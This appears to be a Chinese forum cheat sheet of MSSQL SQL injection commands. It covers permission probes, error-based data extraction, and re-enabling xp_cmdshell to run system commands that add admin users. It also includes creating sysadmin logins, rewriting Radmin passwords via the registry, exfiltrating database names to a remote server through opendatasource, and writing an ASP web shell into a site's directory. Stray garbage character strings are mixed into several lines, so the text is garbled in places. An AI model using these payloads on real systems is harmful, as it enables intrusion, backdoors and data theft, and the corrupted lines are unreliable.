常用的一些注入命令

admin

//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
! K4 U/ Z- t# V# |- ^And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --


2 T/ O, v0 X* T2 j( Q( b: {7 i数字类型
2 c- |4 S5 x# i6 Uand char(124)%2Buser%2Bchar(124)=0
6 J7 a, K% Q* e+ ~  ]
- K: `( V1 \: F2 A' x& T) x; j字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='

搜索类型
6 q4 l/ L$ ]& z; t4 I6 d7 N' and char(124)%2Buser%2Bchar(124)=0 and '%'='
4 g5 f) P" F1 T2 n
爆用户名
and user>0
' and user>0 and ''='

) B2 w! |4 k' R& H4 G2 M检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
- t* z) {8 Q' J5 G: @1 c
检测是不是MSSQL数据库
( S. \( c2 }5 y* d1 L+ C2 Wand exists (select * from sysobjects);--

检测是否支持多行
;declare @d int;--

# n/ l& S/ M. D. }; g% x$ _恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--


select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
4 _& P- U3 X8 Y3 F
//-----------------------
//       执行命令
//-----------------------
首先开启沙盘模式：
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb执行系统命令
0 l  M! C' X6 r: L' lselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
* ~4 J3 C$ L. ?7 @, a* y0 P) M$ }
. Z& r' R8 F; L: v2 }* n9 I执行命令
( Z% p/ s& b: b. x$ p% H" v;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
, S; G2 \# b! o3 Q! O
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
3 V$ p3 u; ?' T( Q, l1 z6 F' F
判断xp_cmdshell扩展存储过程是否存在：
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
) v0 K! l5 z0 q3 {& q
5 \+ o* f1 F4 R& G" l0 gREG_SZ
: L/ w+ h, d, `5 O
读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

2 U. ~: V* f, p2 A读取目录内容
1 B! O" \; p' u; c. oexec master..xp_dirtree 'c:\winnt\system32\',1,1
3 C) g: s# Z7 ?2 z) m% Y' U

* s2 m0 B! u& ~  d9 T5 j. R数据库备份
# j& X: k( o! rbackup database pubs to disk = 'c:\123.bak'
9 f) @) n% G+ G0 U  s$ _' Z
  x% Q9 _2 n, l% n//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
1 b; H, O6 B( r( T8 n1 I" L& D


* q# Z; s/ Q: X5 a) L6 ~更改sa口令方法：用sql综合利用工具连接后，执行命令：
" k1 d' Y& o+ |% wexec sp_password NULL,'新密码','sa'

5 w) ]4 ^5 ?- \) w' W/ k0 [添加和删除一个SA权限的用户test：
' [0 {2 V3 ~6 l8 |* B9 Y$ gexec master.dbo.sp_addlogin test,9530772
exec master.dbo.sp_addsrvrolemember test,sysadmin

删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'

添加扩展存储过过程
9 z' p6 T; k$ c1 g! xEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
. O7 U, A& ]  W' `: [- OGRANT exec On xp_proxiedadata TO public


4 `' W) u% o% H0 M" ?( C停掉或激活某个服务。
1 k9 g" C3 b% {2 S) c
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'
1 o; j1 E, k, ~! w( V) w
4 q' F. ?% o  w6 l5 m2 tdbo.xp_subdirs

. @2 r$ Y9 B. l5 G: ~+ q) _% u只列某个目录下的子目录。
' z1 R* j. j; p8 n. @) wxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
9 ]2 m; l% m6 _9 R# Y
6 }0 H; m. y% R% ~6 f1 W5 {dbo.xp_makecab

" _% Z4 Q3 e* A+ B; n. E# w将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab
, g' ]1 p" b) c, d'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
% W: y2 y/ _3 I9 @9 o2 H9 Z'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

& f( P: ^! k5 ~- R4 Lxp_terminate_process
3 `9 ]3 o7 R- O( n
停掉某个执行中的程序，但赋予的参数是 Process ID。
利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID
5 Z4 Z- W& A- L
9 N- O3 c/ c; H$ c6 T* G& ?xp_terminate_process 2484

* k" C  G5 H- j+ O& {# V7 Jxp_unpackcab
4 K& m* N$ E% \5 v
6 o% g* L% y# S3 [  I) Y2 d解开压缩档。
7 V" N& e; ~; t- A- Z% `
xp_unpackcab 'c:\test.cab','c:\temp',1
; @8 z* p+ P8 ~& y. ]3 p" I4 a
: w4 `3 Z: `  M+ p, \6 ]
某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
0 |9 L7 H! u2 `" {* }  U
create database lcx;
% Y$ p/ q# n- p. lCreate TABLE ku(name nvarchar(256) null);
1 y7 a; D$ Z, l. s8 G4 HCreate TABLE biao(id int NULL,name nvarchar(256) null);
  P1 J; k* f9 C9 O* D
//得到数据库名
0 C, v4 l' u- j  U& X/ N- Qinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
8 C1 H; Y+ @$ N$ s2 r
( w0 K2 p3 p/ X3 u+ A0 @
//在Master中创建表，看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

! @! @( K: G5 W3 r, z用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
8 t; K& [6 ^' a6 ~) U( b1 k! Z
% ^7 t" G5 C: v//更新表内容
Update films SET kind = 'Dramatic' Where id = 123

//删除内容
delete from table_name where Stockid = 3